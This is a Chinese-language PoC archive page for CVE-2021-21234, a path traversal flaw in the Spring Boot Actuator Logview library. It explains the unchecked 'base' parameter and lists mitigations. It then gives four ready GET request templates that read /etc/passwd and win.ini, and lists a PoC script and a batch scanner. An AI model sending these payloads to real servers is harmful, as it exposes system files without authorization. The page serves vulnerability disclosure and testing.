支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: d921581c7da9ec81d72cbfec0fada9d0a6e33707

来源
关联漏洞
标题:Lukashinsch Spring Boot Actuator Logview 路径遍历漏洞 (CVE-2021-21234)
Description:Lukashinsch Spring Boot Actuator Logview是Ffay(Lukashinsch)个人开发者的一个为Spring Boot提供通过Web界面查看日志功能的代码库。 spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,该漏洞源于filename参数未被检查。
介绍
# CVE-2021-21234

**CVE-2021-21234 Spring Boot 目录遍历**

  spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此`filename=../somefile` 将不起作用),但没有充分检查基本文件夹参数,因此`filename=somefile&base=../` 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修补。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。
  
## 漏洞代码位置:



`eu.hinsch.spring.boot.actuator.logview.LogViewEndpoint#view`

 view函数对filename参数进行合法性校验,但是没有对base参数进行合法性校验。
 
 
GET path:

      - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows
      
      - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows
      
      - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux
      
      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux
文件快照

[4.0K] /data/pocs/d921581c7da9ec81d72cbfec0fada9d0a6e33707 ├── [ 220] poc.py ├── [1.8K] README.md ├── [ 294] uri.txt └── [ 534] 批量.py 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。